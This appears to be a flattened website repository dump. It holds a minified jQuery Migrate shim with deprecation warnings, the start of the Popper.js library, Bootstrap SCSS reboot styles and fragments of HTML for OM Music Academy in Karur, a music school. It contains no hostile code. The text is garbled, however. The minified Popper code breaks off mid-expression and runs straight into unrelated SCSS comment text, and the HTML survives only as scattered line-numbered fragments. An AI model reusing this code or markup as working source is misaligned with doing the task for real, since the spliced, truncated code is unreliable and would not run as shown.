t.document && r("'ready' event is deprecated"); 159 | } 160 | }, e.fn.extend({ 161 | bind: function(e, t, n) { 162 | return r("jQuery.fn.bind() is deprecated"), this.on(e, null, t, n); 163 | }, 164 | unbind: function(e, t) { 165 | return r("jQuery.fn.unbind() is deprecated"), this.off(e, null, t); 166 | }, 167 | delegate: function(e, t, n, a) { 168 | return r("jQuery.fn.delegate() is deprecated"), this.on(t, e, n, a); 169 | }, 170 | undelegate: function(e, t, n) { 171 | return r("jQuery.fn.undelegate() is deprecated"), 1 === arguments.length ? this.off(e, "**") : this.off(t, e || "**", n); 172 | }, 173 | hover: function(e, t) { 174 | return r("jQuery.fn.hover() is deprecated"), this.on("mouseenter", e).on("mouseleave", t || e); 175 | } 176 | }); 177 | var x = e.fn.offset; 178 | e.fn.offset = function() { 179 | var n, a = this[0], o = { 180 | top: 0, 181 | left: 0 182 | }; 183 | return a && a.nodeType ? (n = (a.ownerDocument || t.document).documentElement, e.contains(n, a) ? x.apply(this, arguments) : (r("jQuery.fn.offset() requires an element connected to a document"), 184 | o)) : (r("jQuery.fn.offset() requires a valid DOM element"), o); 185 | }; 186 | var k = e.param; 187 | e.param = function(t, n) { 188 | var a = e.ajaxSettings && e.ajaxSettings.traditional; 189 | return void 0 === n && a && (r("jQuery.param() no longer uses jQuery.ajaxSettings.traditional"), 190 | n = a), k.call(this, t, n); 191 | }; 192 | var A = e.fn.andSelf || e.fn.addBack; 193 | e.fn.andSelf = function() { 194 | return r("jQuery.fn.andSelf() is deprecated and removed, use jQuery.fn.addBack()"), 195 | A.apply(this, arguments); 196 | }; 197 | var S = e.Deferred, q = [ [ "resolve", "done", e.Callbacks("once memory"), e.Callbacks("once memory"), "resolved" ], [ "reject", "fail", e.Callbacks("once memory"), e.Callbacks("once memory"), "rejected" ], [ "notify", "progress", e.Callbacks("memory"), e.Callbacks("memory") ] ]; 198 | return e.Deferred = function(t) { 199 | var n = S(), a = n.promise(); 200 | return n.pipe = a.pipe = function() { 201 | var t = arguments; 202 | return r("deferred.pipe() is deprecated"), e.Deferred(function(r) { 203 | e.each(q, function(o, i) { 204 | var s = e.isFunction(t[o]) && t[o]; 205 | n[i[1]](function() { 206 | var t = s && s.apply(this, arguments); 207 | t && e.isFunction(t.promise) ? t.promise().done(r.resolve).fail(r.reject).progress(r.notify) : r[i[0] + "With"](this === a ? r.promise() : this, s ? [ t ] : arguments); 208 | }); 209 | }), t = null; 210 | }).promise(); 211 | }, t && t.call(n, n), n; 212 | }, e.Deferred.exceptionHook = S.exceptionHook, e; 213 | }); 214 | -------------------------------------------------------------------------------- /js/popper.min.js: -------------------------------------------------------------------------------- 1 | /* 2 | Copyright (C) Federico Zivolo 2017 3 | Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT). 4 | */ 5 | (function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto|scroll)/.test(r+s+p)?e:n(o(e))}function r(e){var o=e&&e.offsetParent,i=o&&o.nodeName;return i&&'BODY'!==i&&'HTML'!==i?-1!==['TD','TABLE'].indexOf(o.nodeName)&&'static'===t(o,'position')?r(o):o:e?e.ownerDocument.documentElement:document.documentElement}function p(e){var t=e.nodeName;return'BODY'!==t&&('HTML'===t||r(e.firstElementChild)===e)}function s(e){return null===e.parentNode?e:s(e.parentNode)}function d(e,t){if(!e||!e.nodeType||!t||!t.nodeType)return document.documentElement;var o=e.compareDocumentPosition(t)&Node.DOCUMENT_POSITION_FOLLOWING,i=o?e:t,n=o?t:e,a=document.createRange();a.setStart(i,0),a.setEnd(n,0);var l=a.commonAncestorContainer;if(e!==l&&t!==l||i.contains(n))return p(l)?l:r(l);var f=s(e);return f.host?d(f.host,t):d(e,s(t).host)}function a(e){var t=1`s get reset. However, we also reset the\n// bottom margin to use `rem` units instead of `em`.\np {\n margin-top: 0;\n margin-bottom: $paragraph-margin-bottom;\n}\n\n// Abbreviations\n//\n// 1. Remove the bottom border in Firefox 39-.\n// 2. Add the correct text decoration in Chrome, Edge, IE, Opera, and Safari.\n// 3. Add explicit cursor to indicate changed behavior.\n// 4. Duplicate behavior to the data-* attribute for our tooltip plugin\n\nabbr[title],\nabbr[data-original-title] { // 4\n text-decoration: underline; // 2\n text-decoration: underline dotted; // 2\n cursor: help; // 3\n border-bottom: 0; // 1\n}\n\naddress {\n margin-bottom: 1rem;\n font-style: normal;\n line-height: inherit;\n}\n\nol,\nul,\ndl {\n margin-top: 0;\n margin-bottom: 1rem;\n}\n\nol ol,\nul ul,\nol ul,\nul ol {\n margin-bottom: 0;\n}\n\ndt {\n font-weight: $dt-font-weight;\n}\n\ndd {\n margin-bottom: .5rem;\n margin-left: 0; // Undo browser default\n}\n\nblockquote {\n margin: 0 0 1rem;\n}\n\ndfn {\n font-style: italic; // Add the correct font style in Android 4.3-\n}\n\n// stylelint-disable font-weight-notation\nb,\nstrong {\n font-weight: bolder; // Add the correct font weight in Chrome, Edge, and Safari\n}\n// stylelint-enable font-weight-notation\n\nsmall {\n font-size: 80%; // Add the correct font size in all browsers\n}\n\n//\n// Prevent `sub` and `sup` elements from affecting the line height in\n// all browsers.\n//\n\nsub,\nsup {\n position: relative;\n font-size: 75%;\n line-height: 0;\n vertical-align: baseline;\n}\n\nsub { bottom: -.25em; }\nsup { top: -.5em; }\n\n\n//\n// Links\n//\n\na {\n color: $link-color;\n text-decoration: $link-decoration;\n background-color: transparent; // Remove the gray background on active links in IE 10.\n -webkit-text-decoration-skip: objects; // Remove gaps in links underline in iOS 8+ and Safari 8+.\n\n @include hover {\n color: $link-hover-color;\n text-decoration: $link-hover-decoration;\n }\n}\n\n// And undo these styles for placeholder links/named anchors (without href)\n// which have not been made explicitly keyboard-focusable (without tabindex).\n// It would be more straightforward to just use a[href] in previous block, but that\n// causes specificity issues in many other styles that are too complex to fix.\n// See https://github.com/twbs/bootstrap/issues/19402\n\na:not([href]):not([tabindex]) {\n color: inherit;\n text-decoration: none;\n\n @include hover-focus {\n color: inherit;\n text-decoration: none;\n }\n\n &:focus {\n outline: 0;\n }\n}\n\n\n//\n// Code\n//\n\n// stylelint-disable font-family-no-duplicate-names\npre,\ncode,\nkbd,\nsamp {\n font-family: monospace, monospace; // Correct the inheritance and scaling of font size in all browsers.\n font-size: 1em; // Correct the odd `em` font sizing in all browsers.\n}\n// stylelint-enable font-family-no-duplicate-names\n\npre {\n // Remove browser default top margin\n margin-top: 0;\n // Reset browser default of `1em` to use `rem`s\n margin-bottom: 1rem;\n // Don't allow content to break outside\n overflow: auto;\n // We have @viewport set which causes scrollbars to overlap content in IE11 and Edge, so\n // we force a non-overlapping, non-auto-hiding scrollbar to counteract.\n -ms-overflow-style: scrollbar;\n}\n\n\n//\n// Figures\n//\n\nfigure {\n // Apply a consistent margin strategy (matches our type styles).\n margin: 0 0 1rem;\n}\n\n\n//\n// Images and content\n//\n\nimg {\n vertical-align: middle;\n border-style: none; // Remove the border on images inside links in IE 10-.\n}\n\nsvg:not(:root) {\n overflow: hidden; // Hide the overflow in IE\n}\n\n\n//\n// Tables\n//\n\ntable {\n border-collapse: collapse; // Prevent double borders\n}\n\ncaption {\n padding-top: $table-cell-padding;\n padding-bottom: $table-cell-padding;\n color: $table-caption-color;\n text-align: left;\n caption-side: bottom;\n}\n\nth {\n // Matches default `

Just say yogiramsurathkumar yogiramsurathkumar yogiramsurathkumar jayagururaya 🦋 You will get all blessings
102 |
"Unlock your musical potential with our academy's expert instructors and personalized guidance, making every note a step towards mastery." 121 | 122 |
123 |
135 |
143 |
151 |
169 |
177 |
185 | 202 | Welcome to OM Music Academy Karur, where we blend Classical and Western music traditions to cultivate aspiring musicians. Our students have showcased their talents on numerous stages, supported by our dedication to their growth and recognition in the music field. Offering both online and offline classes, we cater to diverse learning preferences while embracing the holistic guidance of Yogiramsuratkumar. Join us for an enriching journey where every note is a step towards musical excellence and self-discovery. 203 |
204 | 205 | Join Us 206 | 207 |
226 | "Memories are the timeless treasures of the heart, weaving the tapestry of our lives with moments that endure."
227 |386 | Would you like to explore the world of music with OM Music Academy? Our academy offers expert training in both Classical and Western music genres, providing a platform for aspiring musicians to shine. With numerous achievements including performances on prestigious stages, we are committed to nurturing talent and helping students excel in the music field. Whether you prefer online or offline classes, we cater to your needs. Located in Karur and guided by the wisdom of Yogiramsuratkumar, we invite you to request a callback and begin your musical journey with us. 387 |
388 |